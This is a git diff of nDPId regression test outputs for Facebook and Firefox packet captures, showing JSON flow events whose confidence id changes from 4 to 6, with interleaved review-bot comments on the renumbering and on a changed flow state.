~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 1042 chars diff --git a/test/results/facebook.pcap.out b/test/results/facebook.pcap.out index 75bb18e77..8c1be5900 100644 --- a/test/results/facebook.pcap.out +++ b/test/results/facebook.pcap.out 
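Review bot: The key inside `confidence` changes from `"4"` to `"6"` while the label stays `"DPI"` in all three changed events of the exe_download_as_png.pcap.out hunk (detected, detection-update, end), so a consumer that matches on the numeric key rather than the label would stop recognising DPI-confirmed flows after this bump. The same renumbering appears in the facebook.pcap.out and firefox.pcap.out hunks that follow. The commit message only says the submodule was bumped; the renumbering should be stated there or in the changelog, for example `ndpi.confidence id for "DPI" changed from 4 to 6; match on the label, not the id`. Whether a schema or bundled example consumer pins the old id cannot be seen from these hunks and should be checked.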
@@ -4,17 +4,17 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1472393122365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393122365,"pkt":"mAyC0zx8MFLLbJwbCABFAAA84M9AAEAGjxHAqCsSQtycRMtiAbv14btyAAAAAKACchDLCQAAAgQFtAQCCAoAS1u9AAAAAAEDAwc="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1472393122668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393122668,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAE0GYuFC3JxEwKgrEgG7y2LsHfNy9eG7c6ASNpzIhwAAAgQFeAQCCAq7uwhkAEtbvQEDAwg="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1472393122668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1472393122668,"pkt":"mAyC0zx8MFLLbJwbCABFAAA04NBAAEAGjxjAqCsSQtycRMtiAbv14btz7B3zc4AQAOXLAQAAAQEICgBLXBi7uwhk"} 
-00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393122365,"flow_last_seen":1472393122668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1472393122668,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} -00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393122365,"flow_last_seen":1472393122981,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1472393122981,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}} 
-01363{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1472393122365,"flow_last_seen":1472393122982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3369,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1472393122982,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","server_names":"*.facebook.com,*.facebook.net,*.fb.com,*.fbcdn.net,*.fbsbx.com,*.m.facebook.com,*.messenger.com,*.xx.fbcdn.net,*.xy.fbcdn.net,*.xz.fbcdn.net,facebook.com,fb.com,messenger.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","alpn":"h2,spdy\/3.1,http\/1.1","fingerprint":"A0:4E:AF:B3:48:C2:6B:15:A8:C1:AA:87:A3:33:CA:A3:CD:EE:C9:C9"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393122365,"flow_last_seen":1472393122668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1472393122668,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} +00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393122365,"flow_last_seen":1472393122981,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1472393122981,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}} +01363{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1472393122365,"flow_last_seen":1472393122982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3369,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1472393122982,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"facebook.com","server_names":"*.facebook.com,*.facebook.net,*.fb.com,*.fbcdn.net,*.fbsbx.com,*.m.facebook.com,*.messenger.com,*.xx.fbcdn.net,*.xy.fbcdn.net,*.xz.fbcdn.net,facebook.com,fb.com,messenger.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","alpn":"h2,spdy\/3.1,http\/1.1","fingerprint":"A0:4E:AF:B3:48:C2:6B:15:A8:C1:AA:87:A3:33:CA:A3:CD:EE:C9:C9"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472393123550,"flow_last_seen":1472393123550,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1472393123550,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1472393123550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393123550,"pkt":"mAyC0zx8MFLLbJwbCABFAAA8dR1AAEAGZLPAqCsSHw1WJK5GAbsvASg9AAAAAKACchBhGgAAAgQFtAQCCAoAS10gAAAAAAEDAwc="} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1472393123682,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393123682,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAFMGxtAfDVYkwKgrEgG7rkZw6dh2LwEoPqASNpwMewAAAgQFeAQCCAolRdDWAEtdIAEDAwg="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1472393123682,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1472393123682,"pkt":"mAyC0zx8MFLLbJwbCABFAAA0dR5AAEAGZLrAqCsSHw1WJK5GAbsvASg+cOnYd4AQAOVhEgAAAQEICgBLXUglRdDW"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393123550,"flow_last_seen":1472393123683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1472393123683,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} 
-00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393123550,"flow_last_seen":1472393123838,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1472393123838,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1472393122365,"flow_last_seen":1472393123665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4475,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":41,"flow_first_seen":1472393123550,"flow_last_seen":1472393124229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":22044,"flow_avg_l4_payload_len":537,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393123550,"flow_last_seen":1472393123683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1472393123683,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} 
+00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393123550,"flow_last_seen":1472393123838,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1472393123838,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1472393122365,"flow_last_seen":1472393123665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4475,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1472393123550,"flow_last_seen":1472393124229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":22044,"flow_avg_l4_payload_len":537,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","packets-captured":60,"packets-processed":60,"total-skipped-flows":0,"total-l4-payload-len":26519,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1472393124229} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 60/60 @@ -24,9 +24,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5883564 bytes -~~ total memory freed........: 5883564 bytes -~~ total allocations/frees...: 118199/118199 +~~ total memory allocated....: 6017198 bytes +~~ total memory freed........: 6017198 bytes +~~ total allocations/frees...: 120961/120961 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 1368 chars 
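Review bot: The idle event for flow 2 is the one record in the facebook.pcap.out hunk that changes more than the confidence id. The old line (`-00587`) has `"flow_state":"info"` and no `ndpi` object, while the new line (`+00691`) has `"flow_state":"finished"` and carries `ndpi` with `"proto":"TLS.Facebook"`. This changes when detection counts as complete for that flow, presumably as a result of the libnDPI bump, and the commit message does not mention it. It is worth confirming that the new state is intended and recording it, for example `facebook.pcap: flow 2 now reaches "finished" before the idle event`.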
diff --git a/test/results/firefox.pcap.out b/test/results/firefox.pcap.out index 2991461f9..b29f4ffe8 100644 --- a/test/results/firefox.pcap.out +++ b/test/results/firefox.pcap.out 
@@ -4,20 +4,20 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620927997754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927997754,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl5AbuZmizAAAAAALAC\/\/9OVwAAAgQFtAEDAwUBAQgKNAyUbQAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620927997781,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927997781,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yXkJiZGFmZoswaAS\/oiCawAAAgQFrAQCCAo8IAcuNAyUbQEDAwc="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620927997781,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927997781,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl5AbuZmizBCYmRhoAQECyfcgAAAQEICjQMlIc8IAcu"} 
-00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927997754,"flow_last_seen":1620927997782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620927997782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927997754,"flow_last_seen":1620927997814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620927997814,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927997754,"flow_last_seen":1620927997782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620927997782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927997754,"flow_last_seen":1620927997814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620927997814,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998782,"flow_last_seen":1620927998782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927998782,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620927998782,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927998782,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Esl\/AbveSGQcAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKNAyYZQAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927998806,"flow_last_seen":1620927998806,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927998806,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620927998806,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927998806,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmEAbtCftk8AAAAALAC\/\/\/03wAAAgQFtAEDAwUBAQgKNAyYeQAAAAAEAgAA"} 